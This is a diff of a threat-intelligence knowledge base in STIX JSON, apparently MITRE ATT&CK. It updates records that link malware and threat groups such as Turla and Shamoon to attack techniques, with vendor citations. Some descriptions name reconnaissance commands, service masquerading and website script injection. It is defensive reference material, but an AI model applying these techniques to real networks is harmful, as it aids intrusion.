+ "modified": "2020-03-31T22:18:43.131Z",
"created": "2017-05-31T21:33:27.030Z"
},
{
@@ -61824,12 +62847,12 @@
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
- "source_ref": "tool--65370d0b-3bd4-4653-8cf9-daf56f6be830",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--ca9d3402-ada3-484d-876a-d717bd6e05f2",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-01-16T16:13:52.465Z"
+ "created": "2018-01-16T16:13:52.465Z",
+ "source_ref": "tool--65370d0b-3bd4-4653-8cf9-daf56f6be830",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--ca9d3402-ada3-484d-876a-d717bd6e05f2"
},
{
"id": "relationship--bc8f14a1-dc24-42cb-a0dd-3cc0c25d5eae",
@@ -61840,16 +62863,16 @@
],
"external_references": [
{
- "source_name": "McAfee Gold Dragon",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/",
"description": "Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims\u2019 Systems. Retrieved June 6, 2018.",
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
+ "source_name": "McAfee Gold Dragon"
}
],
"source_ref": "malware--b9799466-9dd7-4098-b2d6-f999ce50b9a8",
"relationship_type": "uses",
"target_ref": "attack-pattern--d1fcf083-a721-4223-aedf-bf8960798d62",
"type": "relationship",
- "modified": "2020-03-19T19:41:33.765Z",
+ "modified": "2020-04-21T23:09:31.059Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -62036,14 +63059,19 @@
"source_name": "Secureworks BRONZE BUTLER Oct 2017"
},
{
- "url": "https://www.symantec.com/connect/blogs/tick-cyberespionage-group-zeros-japan",
+ "source_name": "Symantec Tick Apr 2016",
"description": "DiMaggio, J. (2016, April 28). Tick cyberespionage group zeros in on Japan. Retrieved July 16, 2018.",
- "source_name": "Symantec Tick Apr 2016"
+ "url": "https://www.symantec.com/connect/blogs/tick-cyberespionage-group-zeros-japan"
+ },
+ {
+ "source_name": "Trend Micro Tick November 2019",
+ "url": "https://documents.trendmicro.com/assets/pdf/Operation-ENDTRADE-TICK-s-Multi-Stage-Backdoors-for-Attacking-Industries-and-Stealing-Classified-Data.pdf",
+ "description": "Chen, J. et al. (2019, November). Operation ENDTRADE: TICK\u2019s Multi-Stage Backdoors for Attacking Industries and Stealing Classified Data. Retrieved June 9, 2020."
}
],
- "description": "(Citation: Secureworks BRONZE BUTLER Oct 2017)(Citation: Symantec Tick Apr 2016)",
+ "description": "(Citation: Secureworks BRONZE BUTLER Oct 2017)(Citation: Symantec Tick Apr 2016)(Citation: Trend Micro Tick November 2019)",
"type": "relationship",
- "modified": "2019-03-22T19:57:37.439Z",
+ "modified": "2020-06-24T01:27:31.917Z",
"created": "2018-01-16T16:13:52.465Z"
},
{
@@ -62123,12 +63151,12 @@
"url": "https://www.symantec.com/security_response/writeup.jsp?docid=2012-051515-3445-99"
}
],
- "source_ref": "malware--c251e4a5-9a2e-4166-8e42-442af75c3b9a",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "malware--c251e4a5-9a2e-4166-8e42-442af75c3b9a",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32"
},
{
"id": "relationship--d7699bcf-5732-40f5-a715-d430b00b043e",
@@ -62507,22 +63535,27 @@
{
"id": "relationship--3c630128-27ba-4c71-b09a-c9ac39e7acac",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Shamoon](https://attack.mitre.org/software/S0140) creates a new service named \u201cntssrv\u201d that attempts to appear legitimate; the service's display name is \u201cMicrosoft Network Realtime Inspection Service\u201d and its description is \u201cHelps guard against time change attempts targeting known and newly discovered vulnerabilities in network time protocols.\u201d(Citation: Palo Alto Shamoon Nov 2016)",
+ "description": "[Shamoon](https://attack.mitre.org/software/S0140) creates a new service named \u201cntssrv\u201d that attempts to appear legitimate; the service's display name is \u201cMicrosoft Network Realtime Inspection Service\u201d and its description is \u201cHelps guard against time change attempts targeting known and newly discovered vulnerabilities in network time protocols.\u201d Newer versions create the \"MaintenaceSrv\" service, which misspells the word \"maintenance.\"(Citation: Palo Alto Shamoon Nov 2016)(Citation: McAfee Shamoon December 2018)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "source_name": "Palo Alto Shamoon Nov 2016",
+ "url": "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/",
"description": "Falcone, R.. (2016, November 30). Shamoon 2: Return of the Disttrack Wiper. Retrieved January 11, 2017.",
- "url": "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/"
+ "source_name": "Palo Alto Shamoon Nov 2016"
+ },
+ {
+ "source_name": "McAfee Shamoon December 2018",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/shamoon-returns-to-wipe-systems-in-middle-east-europe/",
+ "description": "Mundo, A., Roccia, T., Saavedra-Morales, J., Beek, C.. (2018, December 14). Shamoon Returns to Wipe Systems in Middle East, Europe . Retrieved May 29, 2020."
}
],
"source_ref": "malware--8901ac23-6b50-410c-b0dd-d8174a86f9b3",
"relationship_type": "uses",
"target_ref": "attack-pattern--7bdca9d5-d500-4d7d-8c52-5fd47baf4c0c",
"type": "relationship",
- "modified": "2020-03-18T15:49:09.611Z",
+ "modified": "2020-05-29T18:11:23.516Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -62638,22 +63671,27 @@
{
"id": "relationship--84e0c62b-b1a6-4ecd-8607-f0b516cb48f6",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[RTM](https://attack.mitre.org/software/S0148) tries to add a scheduled task to establish persistence.(Citation: ESET RTM Feb 2017)",
+ "description": "[RTM](https://attack.mitre.org/software/S0148) tries to add a scheduled task to establish persistence.(Citation: ESET RTM Feb 2017)(Citation: Unit42 Redaman January 2019)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "source_name": "ESET RTM Feb 2017",
- "description": "Faou, M. and Boutin, J.. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
- "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf"
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2017/02/Read-The-Manual.pdf",
+ "description": "Faou, M. and Boutin, J. (2017, February). Read The Manual: A Guide to the RTM Banking Trojan. Retrieved March 9, 2017.",
+ "source_name": "ESET RTM Feb 2017"
+ },
+ {
+ "source_name": "Unit42 Redaman January 2019",
+ "url": "https://unit42.paloaltonetworks.com/russian-language-malspam-pushing-redaman-banking-malware/",
+ "description": "Duncan, B., Harbison, M. (2019, January 23). Russian Language Malspam Pushing Redaman Banking Malware. Retrieved June 16, 2020."
}
],
"source_ref": "malware--92ec0cbd-2c30-44a2-b270-73f4ec949841",
"relationship_type": "uses",
"target_ref": "attack-pattern--005a06c6-14bf-4118-afa0-ebcd8aebb0c9",
"type": "relationship",
- "modified": "2020-03-28T21:42:17.265Z",
+ "modified": "2020-06-16T20:51:13.735Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -62691,12 +63729,12 @@
"url": "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html"
}
],
- "source_ref": "malware--98e8a977-3416-43aa-87fa-33e287e9c14c",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--98e8a977-3416-43aa-87fa-33e287e9c14c",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--354a7f88-63fb-41b5-a801-ce3b377b36f1"
},
{
"id": "relationship--dcc2c503-25dc-47bb-b9cb-35ce27e73cd2",
@@ -62774,7 +63812,7 @@
{
"id": "relationship--93f1726f-f172-4705-a13a-d5adaeb4e91b",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[APT32](https://attack.mitre.org/groups/G0050) has added JavaScript to victim websites to download additional frameworks that profile and compromise website visitors.(Citation: Volexity OceanLotus Nov 2017)(Citation: Cybereason Oceanlotus May 2017)",
+ "description": "[APT32](https://attack.mitre.org/groups/G0050) has added JavaScript to victim websites to download additional frameworks that profile and compromise website visitors.(Citation: Volexity OceanLotus Nov 2017)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -62783,18 +63821,13 @@
"source_name": "Volexity OceanLotus Nov 2017",
"description": "Lassalle, D., et al. (2017, November 6). OceanLotus Blossoms: Mass Digital Surveillance and Attacks Targeting ASEAN, Asian Nations, the Media, Human Rights Groups, and Civil Society. Retrieved November 6, 2017.",
"url": "https://www.volexity.com/blog/2017/11/06/oceanlotus-blossoms-mass-digital-surveillance-and-exploitation-of-asean-nations-the-media-human-rights-and-civil-society/"
- },
- {
- "source_name": "Cybereason Oceanlotus May 2017",
- "url": "https://www.cybereason.com/blog/operation-cobalt-kitty-apt",
- "description": "Dahan, A. (2017, May 24). OPERATION COBALT KITTY: A LARGE-SCALE APT IN ASIA CARRIED OUT BY THE OCEANLOTUS GROUP. Retrieved November 5, 2018."
}
],
"source_ref": "intrusion-set--247cb30b-955f-42eb-97a5-a89fef69341e",
"relationship_type": "uses",
"target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
"type": "relationship",
- "modified": "2020-03-18T19:33:54.976Z",
+ "modified": "2020-06-19T20:04:12.448Z",
"created": "2018-01-16T16:13:52.465Z"
},
{
@@ -62895,12 +63928,12 @@
"url": "https://www.symantec.com/blogs/threat-intelligence/orangeworm-targets-healthcare-us-europe-asia"
}
],
- "source_ref": "malware--c2417bab-3189-4d4d-9d60-96de2cdaf0ab",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-10-17T00:14:20.652Z"
+ "created": "2018-10-17T00:14:20.652Z",
+ "source_ref": "malware--c2417bab-3189-4d4d-9d60-96de2cdaf0ab",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--2959d63f-73fd-46a1-abd2-109d7dcede32"
},
{
"id": "relationship--01b924d7-42dd-412f-a9af-cabcb46512ea",
@@ -63083,7 +64116,7 @@
{
"id": "relationship--e93c8f61-b2c9-4877-8c2c-12bd37aa5a87",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[POWERSTATS](https://attack.mitre.org/software/S0223) can retrieve screenshots from compromised hosts.(Citation: FireEye MuddyWater Mar 2018)",
+ "description": "[POWERSTATS](https://attack.mitre.org/software/S0223) can retrieve screenshots from compromised hosts.(Citation: FireEye MuddyWater Mar 2018)(Citation: TrendMicro POWERSTATS V3 June 2019)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -63092,13 +64125,18 @@
"url": "https://www.fireeye.com/blog/threat-research/2018/03/iranian-threat-group-updates-ttps-in-spear-phishing-campaign.html",
"description": "Singh, S. et al.. (2018, March 13). Iranian Threat Group Updates Tactics, Techniques and Procedures in Spear Phishing Campaign. Retrieved April 11, 2018.",
"source_name": "FireEye MuddyWater Mar 2018"
+ },
+ {
+ "source_name": "TrendMicro POWERSTATS V3 June 2019",
+ "url": "https://blog.trendmicro.com/trendlabs-security-intelligence/muddywater-resurfaces-uses-multi-stage-backdoor-powerstats-v3-and-new-post-exploitation-tools/",
+ "description": "Lunghi, D. and Horejsi, J.. (2019, June 10). MuddyWater Resurfaces, Uses Multi-Stage Backdoor POWERSTATS V3 and New Post-Exploitation Tools. Retrieved May 14, 2020."
}
],
"source_ref": "malware--e8545794-b98c-492b-a5b3-4b5a02682e37",
"relationship_type": "uses",
"target_ref": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688",
"type": "relationship",
- "modified": "2019-04-22T22:36:52.990Z",
+ "modified": "2020-05-18T19:37:52.430Z",
"created": "2018-04-18T17:59:24.739Z"
},
{
@@ -63188,7 +64226,7 @@
{
"id": "relationship--b8a1739d-240b-46c1-a25a-b82d1c4e4765",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Turla](https://attack.mitre.org/groups/G0010) surveys a system upon check-in to discover remote systems on a local network using the net view and net view /DOMAIN commands.(Citation: Kaspersky Turla)",
+ "description": "[Turla](https://attack.mitre.org/groups/G0010) surveys a system upon check-in to discover remote systems on a local network using the net view and net view /DOMAIN commands. [Turla](https://attack.mitre.org/groups/G0010) has also used net group \"Domain Computers\" /domain, net group \"Domain Controllers\" /domain, and net group \"Exchange Servers\" /domain to enumerate domain computers, including the organization's DC and Exchange Server.(Citation: Kaspersky Turla)(Citation: ESET ComRAT May 2020)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -63197,13 +64235,18 @@
"url": "https://securelist.com/the-epic-turla-operation/65545/",
"description": "Kaspersky Lab's Global Research and Analysis Team. (2014, August 7). The Epic Turla Operation: Solving some of the mysteries of Snake/Uroburos. Retrieved December 11, 2014.",
"source_name": "Kaspersky Turla"
+ },
+ {
+ "source_name": "ESET ComRAT May 2020",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
+ "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020."
}
],
"source_ref": "intrusion-set--7a19ecb1-3c65-4de3-a230-993516aed6a6",
"relationship_type": "uses",
"target_ref": "attack-pattern--e358d692-23c0-4a31-9eb6-ecc13a8d7735",
"type": "relationship",
- "modified": "2019-07-14T21:04:44.998Z",
+ "modified": "2020-06-29T02:52:31.794Z",
"created": "2017-05-31T21:33:27.045Z"
},
{
@@ -63241,12 +64284,12 @@
"url": "https://www2.fireeye.com/rs/fireye/images/rpt-apt30.pdf"
}
],
- "source_ref": "malware--b1de6916-7a22-4460-8d26-6b5483ffaa2a",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--b1de6916-7a22-4460-8d26-6b5483ffaa2a",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279"
},
{
"id": "relationship--fce7fac2-91da-4903-95dc-fb54650c0859",
@@ -63278,16 +64321,15 @@
],
"external_references": [
{
- "description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016.",
"source_name": "DustySky",
- "url": "https://www.clearskysec.com/wp-content/uploads/2016/01/Operation%20DustySky_TLP_WHITE.pdf"
+ "description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016."
}
],
"source_ref": "malware--687c23e4-4e25-4ee7-a870-c5e002511f54",
"relationship_type": "uses",
"target_ref": "attack-pattern--bf90d72c-c00b-45e3-b3aa-68560560d4c5",
"type": "relationship",
- "modified": "2020-03-23T22:01:46.016Z",
+ "modified": "2020-05-14T15:14:33.559Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -63326,7 +64368,7 @@
"relationship_type": "mitigates",
"target_ref": "attack-pattern--4061e78c-1284-44b4-9116-73e4ac3912f7",
"type": "relationship",
- "modified": "2020-03-27T18:01:17.878Z",
+ "modified": "2020-06-20T20:42:37.432Z",
"created": "2018-04-18T17:59:24.739Z"
},
{
@@ -63561,7 +64603,7 @@
"external_references": [
{
"source_name": "Palo Alto Gamaredon Feb 2017",
- "description": "Kasza, A. and Reichel, D.. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
+ "description": "Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
"url": "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/"
}
],
@@ -63569,7 +64611,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--0259baeb-9f63-4c69-bf10-eb038c390688",
"type": "relationship",
- "modified": "2020-03-17T02:15:40.338Z",
+ "modified": "2020-06-22T17:54:15.513Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -63761,22 +64803,27 @@
{
"id": "relationship--5206976b-ac4d-4286-a954-4b1ef5c20adc",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Shamoon](https://attack.mitre.org/software/S0140) obtains the target's IP address and local network segment.(Citation: Palo Alto Shamoon Nov 2016)",
+ "description": "[Shamoon](https://attack.mitre.org/software/S0140) obtains the target's IP address and local network segment.(Citation: Palo Alto Shamoon Nov 2016)(Citation: McAfee Shamoon December 2018)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "source_name": "Palo Alto Shamoon Nov 2016",
+ "url": "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/",
"description": "Falcone, R.. (2016, November 30). Shamoon 2: Return of the Disttrack Wiper. Retrieved January 11, 2017.",
- "url": "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/"
+ "source_name": "Palo Alto Shamoon Nov 2016"
+ },
+ {
+ "source_name": "McAfee Shamoon December 2018",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/shamoon-returns-to-wipe-systems-in-middle-east-europe/",
+ "description": "Mundo, A., Roccia, T., Saavedra-Morales, J., Beek, C.. (2018, December 14). Shamoon Returns to Wipe Systems in Middle East, Europe . Retrieved May 29, 2020."
}
],
"source_ref": "malware--8901ac23-6b50-410c-b0dd-d8174a86f9b3",
"relationship_type": "uses",
"target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0",
"type": "relationship",
- "modified": "2019-04-24T23:59:16.230Z",
+ "modified": "2020-05-29T18:11:23.866Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -63803,7 +64850,7 @@
{
"id": "relationship--9eefeafd-aca1-4e4c-8d29-ea6f9154808a",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Turla](https://attack.mitre.org/groups/G0010) surveys a system upon check-in to discover network configuration details using the arp -a, nbtstat -n, nbtscan, and net config commands.(Citation: Kaspersky Turla)(Citation: Symantec Waterbug Jun 2019) [Turla](https://attack.mitre.org/groups/G0010) RPC backdoors have also retrieved registered RPC interface information from process memory.(Citation: ESET Turla PowerShell May 2019)",
+ "description": "[Turla](https://attack.mitre.org/groups/G0010) surveys a system upon check-in to discover network configuration details using the arp -a, nbtstat -n, nbtscan, net config, ipconfig /all, and route commands.(Citation: Kaspersky Turla)(Citation: Symantec Waterbug Jun 2019)(Citation: ESET ComRAT May 2020) [Turla](https://attack.mitre.org/groups/G0010) RPC backdoors have also retrieved registered RPC interface information from process memory.(Citation: ESET Turla PowerShell May 2019)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
@@ -63819,16 +64866,21 @@
"description": "Symantec DeepSight Adversary Intelligence Team. (2019, June 20). Waterbug: Espionage Group Rolls Out Brand-New Toolset in Attacks Against Governments. Retrieved July 8, 2019."
},
{
- "description": "Faou, M. and Dumont R.. (2019, May 29). A dive into Turla PowerShell usage. Retrieved June 14, 2019.",
+ "source_name": "ESET ComRAT May 2020",
+ "url": "https://www.welivesecurity.com/wp-content/uploads/2020/05/ESET_Turla_ComRAT.pdf",
+ "description": "Faou, M. (2020, May). From Agent.btz to ComRAT v4: A ten-year journey. Retrieved June 15, 2020."
+ },
+ {
+ "source_name": "ESET Turla PowerShell May 2019",
"url": "https://www.welivesecurity.com/2019/05/29/turla-powershell-usage/",
- "source_name": "ESET Turla PowerShell May 2019"
+ "description": "Faou, M. and Dumont R.. (2019, May 29). A dive into Turla PowerShell usage. Retrieved June 14, 2019."
}
],
"source_ref": "intrusion-set--7a19ecb1-3c65-4de3-a230-993516aed6a6",
"relationship_type": "uses",
"target_ref": "attack-pattern--707399d6-ab3e-4963-9315-d9d3818cd6a0",
"type": "relationship",
- "modified": "2019-07-14T21:04:44.984Z",
+ "modified": "2020-06-29T02:52:31.826Z",
"created": "2017-05-31T21:33:27.044Z"
},
{
@@ -64125,12 +65177,12 @@
"url": "http://researchcenter.paloaltonetworks.com/2016/01/scarlet-mimic-years-long-espionage-targets-minority-activists/"
}
],
- "source_ref": "malware--463f68f1-5cde-4dc2-a831-68b73488f8f4",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2017-12-14T16:46:06.044Z"
+ "created": "2017-12-14T16:46:06.044Z",
+ "source_ref": "malware--463f68f1-5cde-4dc2-a831-68b73488f8f4",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--3c4a2599-71ee-4405-ba1e-0e28414b4bc5"
},
{
"id": "relationship--10c6cc56-a028-4c2a-b24e-38d97fb4ebb7",
@@ -64248,14 +65300,14 @@
{
"source_name": "Kaspersky Regin",
"description": "Kaspersky Lab's Global Research and Analysis Team. (2014, November 24). THE REGIN PLATFORM NATION-STATE OWNAGE OF GSM NETWORKS. Retrieved December 1, 2014.",
- "url": "https://securelist.com/files/2014/11/Kaspersky_Lab_whitepaper_Regin_platform_eng.pdf"
+ "url": "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/08070305/Kaspersky_Lab_whitepaper_Regin_platform_eng.pdf"
}
],
"source_ref": "malware--4c59cce8-cb48-4141-b9f1-f646edfaadb0",
"relationship_type": "uses",
"target_ref": "attack-pattern--57340c81-c025-4189-8fa0-fc7ede51bae4",
"type": "relationship",
- "modified": "2020-03-16T17:37:15.714Z",
+ "modified": "2020-06-29T01:54:53.342Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -64602,16 +65654,15 @@
],
"external_references": [
{
- "description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016.",
"source_name": "DustySky",
- "url": "https://www.clearskysec.com/wp-content/uploads/2016/01/Operation%20DustySky_TLP_WHITE.pdf"
+ "description": "ClearSky. (2016, January 7). Operation DustySky. Retrieved January 8, 2016."
}
],
"source_ref": "intrusion-set--df71bb3b-813c-45eb-a8bc-f2a419837411",
"relationship_type": "uses",
"target_ref": "attack-pattern--8f4a33ec-8b1f-4b80-a2f6-642b2e479580",
"type": "relationship",
- "modified": "2020-03-23T22:01:46.101Z",
+ "modified": "2020-05-14T14:30:09.437Z",
"created": "2017-05-31T21:33:27.055Z"
},
{
@@ -64665,16 +65716,16 @@
],
"external_references": [
{
- "source_name": "McAfee Gold Dragon",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/",
"description": "Sherstobitoff, R., Saavedra-Morales, J. (2018, February 02). Gold Dragon Widens Olympics Malware Attacks, Gains Permanent Presence on Victims\u2019 Systems. Retrieved June 6, 2018.",
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/gold-dragon-widens-olympics-malware-attacks-gains-permanent-presence-on-victims-systems/"
+ "source_name": "McAfee Gold Dragon"
}
],
"source_ref": "malware--b9799466-9dd7-4098-b2d6-f999ce50b9a8",
"relationship_type": "uses",
"target_ref": "attack-pattern--9efb1ea7-c37b-4595-9640-b7680cd84279",
"type": "relationship",
- "modified": "2020-03-16T23:58:10.644Z",
+ "modified": "2020-04-21T23:09:31.036Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -64754,7 +65805,7 @@
"external_references": [
{
"source_name": "Palo Alto Gamaredon Feb 2017",
- "description": "Kasza, A. and Reichel, D.. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
+ "description": "Kasza, A. and Reichel, D. (2017, February 27). The Gamaredon Group Toolset Evolution. Retrieved March 1, 2017.",
"url": "https://researchcenter.paloaltonetworks.com/2017/02/unit-42-title-gamaredon-group-toolset-evolution/"
}
],
@@ -64762,7 +65813,7 @@
"relationship_type": "uses",
"target_ref": "attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add",
"type": "relationship",
- "modified": "2020-03-17T02:15:40.342Z",
+ "modified": "2020-06-22T17:54:15.486Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -64825,12 +65876,12 @@
"url": "https://pentestlab.blog/2017/04/19/stored-credentials/"
}
],
- "source_ref": "tool--cde2d700-9ed1-46cf-9bce-07364fe8b24f",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--341e222a-a6e3-4f6f-b69c-831d792b1580",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-04-18T17:59:24.739Z"
+ "created": "2018-04-18T17:59:24.739Z",
+ "source_ref": "tool--cde2d700-9ed1-46cf-9bce-07364fe8b24f",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--341e222a-a6e3-4f6f-b69c-831d792b1580"
},
{
"id": "relationship--252c0e02-0da6-4812-b147-81d9cfb3c998",
@@ -65052,14 +66103,14 @@
"target_ref": "tool--2e45723a-31da-4a7e-aaa6-e01998a6788f",
"external_references": [
{
- "url": "https://securingtomorrow.mcafee.com/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
+ "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-uncovers-operation-honeybee-malicious-document-campaign-targeting-humanitarian-aid-groups/",
"description": "Sherstobitoff, R. (2018, March 02). McAfee Uncovers Operation Honeybee, a Malicious Document Campaign Targeting Humanitarian Aid Groups. Retrieved May 16, 2018.",
"source_name": "McAfee Honeybee"
}
],
"description": "(Citation: McAfee Honeybee)",
"type": "relationship",
- "modified": "2019-03-25T12:58:44.342Z",
+ "modified": "2020-04-16T19:41:40.645Z",
"created": "2018-10-17T00:14:20.652Z"
},
{
@@ -65343,22 +66394,27 @@
{
"id": "relationship--0024d82d-97ea-4dc5-81a1-8738862e1f3b",
"created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
- "description": "[Shamoon](https://attack.mitre.org/software/S0140) obtains the system time and will only activate if it is greater than a preset date.(Citation: Palo Alto Shamoon Nov 2016)",
+ "description": "[Shamoon](https://attack.mitre.org/software/S0140) obtains the system time and will only activate if it is greater than a preset date.(Citation: Palo Alto Shamoon Nov 2016)(Citation: Unit 42 Shamoon3 2018)",
"object_marking_refs": [
"marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
],
"external_references": [
{
- "source_name": "Palo Alto Shamoon Nov 2016",
+ "url": "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/",
"description": "Falcone, R.. (2016, November 30). Shamoon 2: Return of the Disttrack Wiper. Retrieved January 11, 2017.",
- "url": "http://researchcenter.paloaltonetworks.com/2016/11/unit42-shamoon-2-return-disttrack-wiper/"
+ "source_name": "Palo Alto Shamoon Nov 2016"
+ },
+ {
+ "description": "Falcone, R. (2018, December 13). Shamoon 3 Targets Oil and Gas Organization. Retrieved March 14, 2019.",
+ "url": "https://unit42.paloaltonetworks.com/shamoon-3-targets-oil-gas-organization/",
+ "source_name": "Unit 42 Shamoon3 2018"
}
],
"source_ref": "malware--8901ac23-6b50-410c-b0dd-d8174a86f9b3",
"relationship_type": "uses",
"target_ref": "attack-pattern--f3c544dc-673c-4ef3-accb-53229f1ae077",
"type": "relationship",
- "modified": "2019-04-24T23:59:16.298Z",
+ "modified": "2020-05-29T18:11:24.446Z",
"created": "2017-12-14T16:46:06.044Z"
},
{
@@ -65558,12 +66614,12 @@
"url": "https://researchcenter.paloaltonetworks.com/2018/06/unit42-rancor-targeted-attacks-south-east-asia-using-plaintee-ddkong-malware-families/"
}
],
- "source_ref": "malware--d186c1d6-e3ac-4c3d-a534-9ddfeb8c57bb",
- "relationship_type": "uses",
- "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18",
"type": "relationship",
"modified": "2018-10-17T00:14:20.652Z",
- "created": "2018-10-17T00:14:20.652Z"
+ "created": "2018-10-17T00:14:20.652Z",
+ "source_ref": "malware--d186c1d6-e3ac-4c3d-a534-9ddfeb8c57bb",
+ "relationship_type": "uses",
+ "target_ref": "attack-pattern--7bc57495-ea59-4380-be31-a64af124ef18"
},
{
"id": "relationship--b41c9b77-536b-49bc-8cb9-a873aa121002",
@@ -65665,14 +66721,14 @@
{
"source_name": "Kaspersky Regin",
